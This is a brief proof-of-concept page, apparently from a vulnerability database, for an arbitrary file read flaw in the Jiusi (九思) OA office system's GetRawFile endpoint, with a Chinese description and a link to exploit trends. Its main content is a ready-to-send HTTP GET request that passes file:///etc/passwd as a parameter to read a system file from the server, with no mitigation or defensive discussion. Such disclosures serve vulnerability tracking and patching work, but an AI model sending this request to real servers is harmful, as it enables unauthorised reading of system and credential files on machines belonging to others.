九思OA GetRawFile-任意文件读取

2021-01-19 九思OA PoC Public

Description

【漏洞对象】九思OA 【涉及版本】GetRawFile 【漏洞描述】 九思OA任意文件读取

PoC

GET /jsoa/GetRawFile?url=file:///etc/passwd HTTP/1.1
Host: 
Accept: */*

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities